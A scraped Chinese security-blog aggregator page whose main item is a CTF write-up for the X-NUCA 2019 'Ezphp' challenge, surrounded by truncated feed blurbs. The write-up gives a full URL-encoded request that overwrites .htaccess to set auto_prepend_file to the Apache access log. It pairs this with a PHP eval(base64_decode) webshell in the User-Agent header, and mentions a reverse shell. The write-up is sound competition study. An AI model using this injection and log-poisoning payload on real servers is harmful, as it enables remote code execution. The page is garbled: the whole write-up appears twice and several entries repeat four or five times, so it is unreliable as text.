190825 reverse-ogeek初赛
好久没写博客了_(:з」∠)_回头有空补一下DEFCON的过程和题目复盘啥的…
babyre
浏览一遍可以看出来很明显是一种压缩算法,简单搜了一下发现比较像LZ77,但是据说有很多变种,没找到什么好的实现就接着自己逆了
简单理解了一下原理,在buff内搜索与后17个字节相匹配的最大子串,如果有就记录下buff的下标和子串长度,没有则写入原始内容以供之后使用
简单来说就是所有数据仅出现一次,其他地方...
Aggregator
X-NUCA 2019 Ezphp题目writeup
5 years 7 months ago
0x00 关于这道题
这道题出现在2019年X-NUCA CTF中,是最简单的web题,也是我唯一能做的web题。不过这个简单是相对的简单,实际上真还算挺难的了,里面的姿势在实际渗透测试中也可能用到,所以写篇文章记下也不算亏
0x01 题面
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
include_once("fl3g.php");
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nJust one chance"); ?> 就是个表面很直白的题,直接丢源码出来,不像某些题要我们自己找源码。 好了,看看代码。首先这个代码上来就删除同目录的文件,然后include一个fl3g.php接着从我们这里接收content和filename参数,在关键字和正则匹配无误之后先再删除同目录文件然后再写入文件。 0x01 完整解题思路 看到删了文件,fl3g.php八成是遭殃了,还有那个Just one change有是什么鬼,似乎是暗示我们必须得一下拿到flag不然flag就被删了。在这里我卡了很久,要读到flag必须得从index.php打进去,而一访问这个index.php是先删文件再管我的参数的。我又不是NSA,没有什么Apache 0day可以打进去。 后来我重新申请个环境,在我点进去之前先访问fl3g.php,发现根本就是404,排除恶趣味主办方把这个php伪装成404的极端情况,这个题的fl3g就他妈是个幌子,I'm angry!
不管怎么说先拿到shell进去一看究竟,我成功地写入了php,但是发现是这个样子的
也就是说这个PHP无法被解析,一下就会想到.htaccess文件的问题,那我们需要先测试下.htaccess能否被覆盖掉,于是上传一个空的上去,服务器马上500了,说明我们对服务器是有影响的。那为什么会有问题导致直接500呢?那是因为输出内容被加上了\nJust one chance,导致.htaccess语句不合法最后服务器出错。 现在我们需要想办法让.htaccess合法。第一个思路是加上注释把这句话注释掉,但是Google了一阵之后发现htaccess大约真的不支持多行注释并且一出错整个服务器就500,看起来注释着一条路走不通。那换一条路径,看看这个htaccess支不支持多行数据呢?抱着这样的想法,我搜索了关键字htaccess multiple line发现真的可以,并且不要求最后什么引号闭合就可以搞。就这样我们可以成功构造htaccess文件了。
我最开始的思路是修改htaccess文件来要求解析php但是发现并不奏效,除了htaccess还有一种神秘力量在阻止我的php执行,我不得不另寻它途。但这些尝试也不是毫无收获,我发现了对content的限制是针对htaccess里面的关键字限制的(尽管可以用空行绕过),侧面证明了题目就是要考察htaccess的利用。
那我一点一点地翻着文档,花了非常长的时间从Apache的官方文档到PHP的官方文档,最后终于找到了一个近乎后门的PHP变量auto_prepend_file,这个变量让我们指定一个路径
,在解析其它PHP的时候先从这个变量指定的目录读取并执行PHP。好了我们需要再找一个文件来包含就可以拿到shell了!
目前的方法有两个,一个是利用/var/log/apache2/access.log这里的access.log然后我在我的User Agent里面加入木马然后包含,还有一个是直接在.htaccess里面的注释里面写入马。比赛的时候我采取的是第一个方法因为我笨,不过至少事实证明这个方法居然还是可行的。最开始的尝试是写入一句话木马,然后通过index.php连接,但是每次index.php都会清理掉我的htaccess,所以这个方法有瑕疵。于是我直接用了php反向连接马来连接我的Vultr辣鸡服务器,最后拿到shell。有个细节需要注意,由于htaccess会把双引号转义,而且还有些奇怪的问题,所以用base64编码,单引号括上,解码eval就可以了
最后的payload如下
GET /?content=%53%65%74%48%61%6e%64%6c%65%72%20%22%61%70%70%6c%69%63%61%74%69%6f%5c%0a%6e%2f%78%2d%68%74%74%70%64%2d%70%68%70%22%0a%70%68%70%5f%76%61%6c%75%65%20%65%6e%67%69%6e%65%20%22%4f%5c%0a%6e%22%0a%70%68%70%5f%76%61%6c%75%65%20%64%69%73%70%6c%61%79%5f%65%72%72%6f%72%73%20%31%20%0a%70%68%70%5f%76%61%6c%75%65%20%20%22%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%5c%0a%6c%65%22%20%20%2f%76%61%72%2f%6c%6f%67%2f%61%70%61%63%68%65%32%2f%61%63%63%65%73%73%2e%6c%6f%67%0a%70%68%70%5f%76%61%6c%75%65%20%6c%6f%67%5f%65%72%72%6f%72%73%20%31%0a%53%65%74%45%6e%76%20%71%71%71%78%78%20%22%61%5c&filename=.htaccess HTTP/1.1
Host: f033deae00f84c159aa539ca6f43163929c36777a4db4b2e.changame.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: <?php eval(base64_decode('为了简洁我删掉了')); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
include_once("fl3g.php");
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nJust one chance"); ?> 就是个表面很直白的题,直接丢源码出来,不像某些题要我们自己找源码。 好了,看看代码。首先这个代码上来就删除同目录的文件,然后include一个fl3g.php接着从我们这里接收content和filename参数,在关键字和正则匹配无误之后先再删除同目录文件然后再写入文件。 0x01 完整解题思路 看到删了文件,fl3g.php八成是遭殃了,还有那个Just one change有是什么鬼,似乎是暗示我们必须得一下拿到flag不然flag就被删了。在这里我卡了很久,要读到flag必须得从index.php打进去,而一访问这个index.php是先删文件再管我的参数的。我又不是NSA,没有什么Apache 0day可以打进去。 后来我重新申请个环境,在我点进去之前先访问fl3g.php,发现根本就是404,排除恶趣味主办方把这个php伪装成404的极端情况,这个题的fl3g就他妈是个幌子,I'm angry!
不管怎么说先拿到shell进去一看究竟,我成功地写入了php,但是发现是这个样子的
也就是说这个PHP无法被解析,一下就会想到.htaccess文件的问题,那我们需要先测试下.htaccess能否被覆盖掉,于是上传一个空的上去,服务器马上500了,说明我们对服务器是有影响的。那为什么会有问题导致直接500呢?那是因为输出内容被加上了\nJust one chance,导致.htaccess语句不合法最后服务器出错。 现在我们需要想办法让.htaccess合法。第一个思路是加上注释把这句话注释掉,但是Google了一阵之后发现htaccess大约真的不支持多行注释并且一出错整个服务器就500,看起来注释着一条路走不通。那换一条路径,看看这个htaccess支不支持多行数据呢?抱着这样的想法,我搜索了关键字htaccess multiple line发现真的可以,并且不要求最后什么引号闭合就可以搞。就这样我们可以成功构造htaccess文件了。
我最开始的思路是修改htaccess文件来要求解析php但是发现并不奏效,除了htaccess还有一种神秘力量在阻止我的php执行,我不得不另寻它途。但这些尝试也不是毫无收获,我发现了对content的限制是针对htaccess里面的关键字限制的(尽管可以用空行绕过),侧面证明了题目就是要考察htaccess的利用。
那我一点一点地翻着文档,花了非常长的时间从Apache的官方文档到PHP的官方文档,最后终于找到了一个近乎后门的PHP变量auto_prepend_file,这个变量让我们指定一个路径
,在解析其它PHP的时候先从这个变量指定的目录读取并执行PHP。好了我们需要再找一个文件来包含就可以拿到shell了!
目前的方法有两个,一个是利用/var/log/apache2/access.log这里的access.log然后我在我的User Agent里面加入木马然后包含,还有一个是直接在.htaccess里面的注释里面写入马。比赛的时候我采取的是第一个方法因为我笨,不过至少事实证明这个方法居然还是可行的。最开始的尝试是写入一句话木马,然后通过index.php连接,但是每次index.php都会清理掉我的htaccess,所以这个方法有瑕疵。于是我直接用了php反向连接马来连接我的Vultr辣鸡服务器,最后拿到shell。有个细节需要注意,由于htaccess会把双引号转义,而且还有些奇怪的问题,所以用base64编码,单引号括上,解码eval就可以了
最后的payload如下
GET /?content=%53%65%74%48%61%6e%64%6c%65%72%20%22%61%70%70%6c%69%63%61%74%69%6f%5c%0a%6e%2f%78%2d%68%74%74%70%64%2d%70%68%70%22%0a%70%68%70%5f%76%61%6c%75%65%20%65%6e%67%69%6e%65%20%22%4f%5c%0a%6e%22%0a%70%68%70%5f%76%61%6c%75%65%20%64%69%73%70%6c%61%79%5f%65%72%72%6f%72%73%20%31%20%0a%70%68%70%5f%76%61%6c%75%65%20%20%22%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%5c%0a%6c%65%22%20%20%2f%76%61%72%2f%6c%6f%67%2f%61%70%61%63%68%65%32%2f%61%63%63%65%73%73%2e%6c%6f%67%0a%70%68%70%5f%76%61%6c%75%65%20%6c%6f%67%5f%65%72%72%6f%72%73%20%31%0a%53%65%74%45%6e%76%20%71%71%71%78%78%20%22%61%5c&filename=.htaccess HTTP/1.1
Host: f033deae00f84c159aa539ca6f43163929c36777a4db4b2e.changame.ichunqiu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: <?php eval(base64_decode('为了简洁我删掉了')); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
DriverTom
如何去挖掘物联网环境中的高级恶意软件威胁
5 years 7 months ago
今天我在KCon 2019上分享了《如何去挖掘物联网环境中的高级恶意软件威胁》,这个议题内容是我从2017年
如何去挖掘物联网环境中的高级恶意软件威胁
5 years 7 months ago
今天我在KCon 2019上分享了《如何去挖掘物联网环境中的高级恶意软件威胁》,这个议题内容是我从2017年
如何去挖掘物联网环境中的高级恶意软件威胁
5 years 7 months ago
今天我在KCon 2019上分享了《如何去挖掘物联网环境中的高级恶意软件威胁》,这个议题内容是我从2017年
如何去挖掘物联网环境中的高级恶意软件威胁
5 years 7 months ago
今天我在KCon 2019上分享了《如何去挖掘物联网环境中的高级恶意软件威胁》,这个议题内容是我从2017年
Cybersecurity - Homefield Advantage
5 years 7 months ago
No one should beat your security team on the homefield! For several years I have been using the term Homefield Advantage in the context of running a security program, especially in regards to certain aspects of red teaming. Homefield Advantage describes well what a mature security program has to realize and leverage.
Wikipedia describes “home advantage” in team sports and highlights some of the benefits:
“This benefit has been attributed to psychological effects supporting fans have on the competitors or referees; to psychological or physiological advantages of playing near home in familiar situations; to the disadvantages away teams suffer from changing time zones or climates, or from the rigors of travel; and, in some sports, to specific rules that favor the home team directly or indirectly.
Now using Hugo for the blog
5 years 7 months ago
Today I finalized moving the blog and publishing to Hugo. It was pretty straight forward and I decided to move things into a master branch on github, and publish via the docs/ folder features of Github pages.
Collision Course: Keeping Up With Digital Complexity in an App-Enabled World
5 years 7 months ago
For every digital transformation enabled by apps, the application itself is a primary target, along with the business logic it supports and all its underlying data. F5 Labs' Preston Hogue writes for SecurityWeek, discussing how we can keep up with digital complexity in an app-enabled world.
What Are Security Controls?
5 years 7 months ago
An overview of the types of countermeasures security practitioners use to reduce risk.
网络安全学习方法论之体系的重要性
5 years 7 months ago
如果你分享的内容过于真实,你就没有发表机会,你要完全假了呢,又没有读者去看,你可以在这个通道里,真一会儿假一会儿地往前走,最重要的还是要往前走。
——Micropoor
古人半部论语治天下,读书考功只须熟读四书,而四书加起来不过区区5万字。可见网络安全学习知识体系的建立是重中之重。
古人将一个职业划分为7个阶段,既:
同样网络安全学习也有10个阶段划,既:
只有体系化的知识结构才能教导你思考问题、引导你洞察趋势、指导你展开行动。
什么是体系?
什么是知识体系?
建立体系的过程?
王国维在《人间词话》中说,古今之成大事业、大学问者,必经过三种之境界:
爱德加·戴尔提出了一套学习模型:模型主要分别为被动学习与主动学习的一个过程。 同时提出,学习效果在30%以下的几种传统方式,都是个人学习或被动学习;而学习效果在50%以上的,都是团队学习、主动学习和参与式学习。
“输出”是最好的学习方式,“输出”的本质是体系重新结构化
这里总结了如下经常碰到的问题,值得每一位网络安全从业人员深思:
方法论结合于实战应用,请参考之前的文章如下:
结语:
在每次分享的同时,深深发现,原来分享,才是我最好的老师。 网络安全亦正亦邪,初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田美池桑竹之属。别在初极狭便放弃这“人间正道”,错过这“土地平旷,屋舍俨然,有良田美池桑竹之属。”,愿每一位读者能找到自己能融合贯通的“武功”,在结合吞噬其他“招式”,如行云流水,石便是器,枝便是剑。
——Micropoor
古人半部论语治天下,读书考功只须熟读四书,而四书加起来不过区区5万字。可见网络安全学习知识体系的建立是重中之重。
古人将一个职业划分为7个阶段,既:
- 奴:自愿和靠人监督的人
- 徒:能力不足,肯自愿学习的人
- 工:老老实实,按规矩做事的人
- 匠:精通一门技艺或手艺的人
- 师:掌握了规律,又能将其传授给他人的人
- 家:有固定的信念,让别人生活的更好的人
- 圣:精通事理,通达万物的人
同样网络安全学习也有10个阶段划,既:
- 问:自愿或靠人监督的人
- 学:能力不足,肯自愿学习的人
- 动:老老实实,按课本或教学实践的人
- 记:记录每次实践或学习心得体会并总结的人
- 体系:建立适合自己的体系,并能把知识碎片化结合到自我体系的人
- 问:体系建立后,重新归纳更新知识,并体系重新结构化的人
- 分享:掌握了规律,又能将其传授给他人的人
- 带团队:有固定的信念,带领团队或集体形成合力的人
- 授业:可以传授道理、教授学业、解答疑难问题,指路人。
- 育才:培养出比自己优秀和强大的人
只有体系化的知识结构才能教导你思考问题、引导你洞察趋势、指导你展开行动。
什么是体系?
- 体系的本质是碎片化知识点的灵活串联与应用
- 知识体系是基于人而存在的,世上不存在不同的人完全相同的知识体系
什么是知识体系?
- 在我的定义中,知识体系是跟碎片知识相对应的概念,指高度有序的知识集合。也就是说,它由两部分组成:一是大量的知识点,二是有序的结构。
建立体系的过程?
- 整理知识碎片化
- 建立知识框架
- 形成知识体系
- 碎片化知识点纳入体系中
王国维在《人间词话》中说,古今之成大事业、大学问者,必经过三种之境界:
- 昨夜西风凋碧树,独立高楼,望尽天涯路
- 衣带渐宽终不悔,为伊消得人憔悴
- 众里寻他千百度,蓦然回首,那人却在灯火阑处
爱德加·戴尔提出了一套学习模型:模型主要分别为被动学习与主动学习的一个过程。 同时提出,学习效果在30%以下的几种传统方式,都是个人学习或被动学习;而学习效果在50%以上的,都是团队学习、主动学习和参与式学习。
“输出”是最好的学习方式,“输出”的本质是体系重新结构化
这里总结了如下经常碰到的问题,值得每一位网络安全从业人员深思:
- 不知道怎么学?
- 不知道学哪个方向?
- 越学越不会?
- 感觉自己跟不上知识更新的速度?
- 从事网安工作若干年后,感觉遇到技术瓶颈,怎么突破?
- 工具/技术招式越来越多,怎么办?
- 从事管理工作后,没有时间或者精力学习技术怎么办?
方法论结合于实战应用,请参考之前的文章如下:
结语:
在每次分享的同时,深深发现,原来分享,才是我最好的老师。 网络安全亦正亦邪,初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田美池桑竹之属。别在初极狭便放弃这“人间正道”,错过这“土地平旷,屋舍俨然,有良田美池桑竹之属。”,愿每一位读者能找到自己能融合贯通的“武功”,在结合吞噬其他“招式”,如行云流水,石便是器,枝便是剑。
Micropoor
In Conversation: The Women in Network Security
5 years 7 months ago
Why does network security matter? On average, there is a hacker attack every 39 seconds. If any of these attacks result in a data breach, they could cost over $150 million, with research suggesting that cyber-attacks could cost businesses over...
Akamai
作文:记一次简单的寻人
5 years 7 months ago
记一次成功的“我有一个大胆的想法”以及与重庆人民的一次神奇邂逅。
作文:记一次简单的寻人
5 years 7 months ago
记一次成功的“我有一个大胆的想法”以及与重庆人民的一次神奇邂逅。
作文:记一次简单的寻人
5 years 7 months ago
记一次成功的“我有一个大胆的想法”以及与重庆人民的一次神奇邂逅。
作文:记一次简单的寻人
5 years 7 months ago
记一次成功的“我有一个大胆的想法”以及与重庆人民的一次神奇邂逅。
作文:记一次简单的寻人
5 years 7 months ago
记一次成功的“我有一个大胆的想法”以及与重庆人民的一次神奇邂逅。
对另一种变形一句话进行分析
5 years 7 months ago
对另一种变形一句话进行分析
admin
修改Android源码实现原生应用双开,应用多开 - luoyesiqiu
5 years 7 months ago
1. 准备 把某系统双开的两个app的信息进行对比 1.1 目录的对比 1.1.1 data目录对比 原应用: 被复制的应用: 1.1.2 apk所在目录对比 原应用: 被复制的应用: 通过对比apk安装目录和数据目录,我们可以知道,该系统的双开是 共用同一个apk ,但是却拥有 独立的数据目录 。
luoyesiqiu
VFIO driver analysis
5 years 7 months ago
Terenceli